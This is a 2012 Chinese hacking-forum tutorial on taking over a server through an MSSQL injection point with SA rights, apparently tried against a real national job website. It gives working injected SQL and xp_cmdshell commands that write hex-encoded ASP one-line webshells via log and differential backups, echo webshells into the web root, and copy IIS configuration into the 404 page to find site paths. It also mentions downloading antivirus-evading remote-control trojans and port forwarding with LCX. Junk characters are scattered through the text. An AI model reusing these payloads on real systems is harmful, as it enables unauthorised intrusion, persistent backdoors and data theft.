找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2108|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————8 q# {) o, u$ v, n0 z, G- c

+ a! S+ @4 @/ N& _8 o2 K# H2 r1 `
" o& Y2 i7 o: B. {, F' J2 W                                                             欢迎高手访问指导,欢迎新手朋友交流学习。3 A7 O4 b8 o3 A* h
" c% J  I9 A, a
                                                                 
7 w1 ]4 A2 _6 h+ ~$ U' f% A                                                                 
% m$ u: x. c, u6 _5 a( ?" }                                                                  论坛: http://www.90team.net/" Z6 K' y# k, e3 a* H
) k8 Q% M% q( r" E0 j

2 K6 w* m7 P$ Q8 W* Q
6 O- D+ G$ P$ A5 _! r/ Y: ]友情检测国家人才网" t8 F. S# X5 z$ ~9 Z" m! X* v$ v& d
3 N, v! @( p# u% F/ f. \9 @1 S
5 i4 W* G% X8 P0 j% A( o
内容:MSSQL注入SA权限不显错模式下的入侵
& |1 f* M) h7 n* s
6 i7 J8 f: ^. N2 B5 G( a* y; v$ l+ s; G* e9 h8 [# }
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。, l  h4 o9 `! K" v, G

4 @2 [# M0 g. `- T) a我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。9 h4 j; p7 _( {
. @2 Q. p8 K- w! Z, O

' g# D6 {# G6 [5 I9 G5 B这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。& L9 s1 {$ _( K) }6 ^/ |! p0 a

- F" Z# s- D9 C6 P  Q4 X8 u# D思路:) C$ k, J5 ^, S$ V9 h
' ]2 Y2 H- P  j* ^
首先:
5 G# @8 d7 @* X  w& S& v! j* k4 T: C* b# R% s. r
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
. d6 ]% B5 ~4 J
7 a* K6 f' j- C3 V% S6 E7 i: z8 p& ~1.日志备份获得Webshell/ [7 c" c! m! `2 [8 F8 I% v& L" }

, J$ f" T/ {5 z2.数据库差异备份获得Webshell
! S1 N+ A, k( F
* N& f6 E$ r* |0 N+ b* N9 Q* Q4.直接下载免杀远控木马。
. m9 R' y  ^/ ?3 G4 P" o/ e# G/ E3 [
5.直接下载LCX将服务器端口转发出来4 z  A* i; D7 @2 m3 X" k

$ N, T: H# ]& d, ^4 C- t6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
( E% |* z/ W& b, q2 \; J8 s# `: p+ V2 O1 D7 [
0 D" h) I; ]+ |! ?" L7 t% u

3 [/ x/ i' b3 U9 P2 ]  `' {& R. ?. Y在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
% k- n: Y' f0 O4 z
1 h; V/ S+ F7 v# t我直接演示后面一个方法/ S8 T5 v3 N; R6 d, m

0 {" O, F7 t6 J
0 M; F1 [" P% P" R分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL ( t  P- o; P. N- y

6 {0 L7 H9 {$ U
" y) e, Y9 |$ y  P/ J. ?) J
3 S/ w$ \: t5 P5 O; Y; D+ \3 {" E6 B! Z+ q1 l
◆日志备份:9 Q$ V/ D2 F. x
# G. A6 @1 N9 x6 v6 C3 v
; d$ Z4 K+ Q8 U9 z
1. 进行初始备份1 {. v7 J3 y9 s
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--/ e/ l' n- H( R1 c! P# ^9 N
2 |; ^5 U; n; [$ G& Z8 C
2. 插入数据
% w% t4 p* B0 t% J! e4 @;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--. c5 ?/ Z/ x" H
3 T8 D9 E: G. `' i4 P
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>$ U# O* p3 x$ r) S3 ~, o) ?* W. \
  
. m2 {! q6 B# e% `3. 备份并获得文件,删除临时表* }5 A. s+ L$ N  D: x
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--8 s. h/ B2 u" I5 `' J  m2 ?; O2 ^
% u' d; \& \, L, f

' W: F) y0 r6 H# C$ Q$ d
& e4 J8 M4 s# o, q; j. g◆数据库差异备份
9 d. e/ d" f- S: c$ N
# \. e; L) M: G3 x7 x(1. 进行差异备份准备工作
6 U' x' B! I$ _9 m+ X1 B2 I# s
$ ^' Q! Y! w) X9 I2 [  b$ V- E;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
0 _+ {) T3 r" t$ ]) {& B: n3 W6 z( S2 R( `2 O* M' \4 P& N
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
4 k8 p# I; [8 @+ N$ y  M- c# F
; i7 C8 s( ]9 k' I  `) m) y1 Q2 [1 [5 f3 Y$ N8 k2 B3 s2 j3 b6 G( ?4 t
(2. 将数据写入到数据库
/ ^8 K& G4 \/ `0 B  N;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
- g# {9 V* Z* z' y' I6 J2 W0 ^" l7 E0 A3 V1 `9 c1 A! S) ]
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%># c; M3 v! V6 m* o& d: ~  S
8 |$ y9 U/ i3 X# I2 \
3. 备份数据库并清理临时文件3 I* W! A3 p; p- ?. G; |
: K7 u! J" a, Q1 ~
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--/ [3 j' y9 S( K  [1 \3 i+ B) V
3 _. c. M$ J) k$ x3 l8 U9 ^
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 8 Y5 S5 a5 R; H: @6 {8 t& [' P

& U+ n- P( p; D0 ?) D2 r3 _$ \( I/ f6 ]4 f# z* ?
) Z& C; H) p/ u' u
用^转义字符来写ASP(一句话木马)文件的方法:   ( V; {2 C# o4 @) A9 U2 A9 D

  Q2 s. x/ F3 v5 e7 e+ N' X1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--7 I* c6 q8 l4 L! @5 R6 {: k

8 ~6 H7 h, O( O6 X, W* R4 J2 x2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
9 C* g8 \, d+ N7 D9 f6 z, U0 }0 ]5 r& Y- @- _+ u
读取IIS配置信息获取web路径, Z& _' ~2 }6 U# q4 S
9 y/ {# Y+ o/ ^+ c1 w8 x% |
     
* ~" q2 T, ]6 d5 y3 v     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
7 J9 g+ S* D& x3 Y- v1 I. Y; J: s% R' T4 q; T- o+ B% g: |
执行命令5 W  N4 R. H/ f, ?
     / H! B( t0 o- w
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
* ?0 Q% [- [1 {* u; `
0 ~; L) ?6 s' y5 \& |
# Q( v( A- R$ S  k8 {* ]% R$ c: h- W7 S  T1 _  p' }

, `% W5 v9 X: X/ Y. a  R' c8 B6 U
% H6 n% `; F0 p+ g" N( Z* Z, E5 X

' G2 r1 ~) W( B# K+ ~3 I4 c- ~, L- A3 {) D
# K' G' `/ a& \

/ C7 a+ T* Q% w. B! p; s1 o* ^1 p6 r- e' s" t: }" R, C

# j7 n0 E0 C8 @( i1 b! E7 z! E5 y/ p& z$ H7 ^& Z8 ?
4 _( a5 Y" V+ E- E. [  F

- a: q, o; I' h: X( B
$ N, s2 W* d! o) o- S: T) o0 k, f2 I' M/ j9 q' W
, I7 K; R9 m9 n3 Q

6 k: \  ^0 X  s% o1 N3 T4 N4 G) a4 T7 j, F$ i7 T  d/ N

. I3 x: f# }8 k( g/ X: Y3 s5 \
1 m, Z! }  x% W3 C& `8 _! l
( R6 c, S( P( E& t2 W' e5 v% [* y9 Y) W

5 i7 H/ r$ n0 T$ H0 J$ `2 {
! i% D+ y1 T& R. O! f, E
, m& v. `$ E9 g/ F" U( O, {2 m. _. j
. R+ Z* s: E5 a+ P
8 p; S7 J! x! e5 u' ^  m1 \' k# B4 Y: H$ C( W; v

* _9 I8 ^$ Q7 z7 t. ?6 n* h$ d& J

1 T3 y7 R! @7 o# U$ H$ h! j9 [" g
8 R- o9 [5 @0 c; h
" H) ^! X& z' R$ Q; \+ {  q4 G, F8 o/ D8 b

; P, t" t' {9 Z2 k! X
. m2 b" g8 x7 \2 l
# z8 c, I" e' T% E- Q; F$ }) |7 b
$ K8 ~, T: C% ?- Q
6 x4 ~! N. c* W7 F# W' F2 H

" r/ ]% k4 e  g; d: z- z- ^1 v
  D' G1 n) n! a3 b9 e" M7 i' _/ S7 M) |! {3 f9 O7 ^1 u, ?2 ]

. N, y- |0 F/ U' O3 N3 S# R: r2 l: {" M+ Z

2 M# @7 _+ p/ X7 ^9 h8 P3 d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表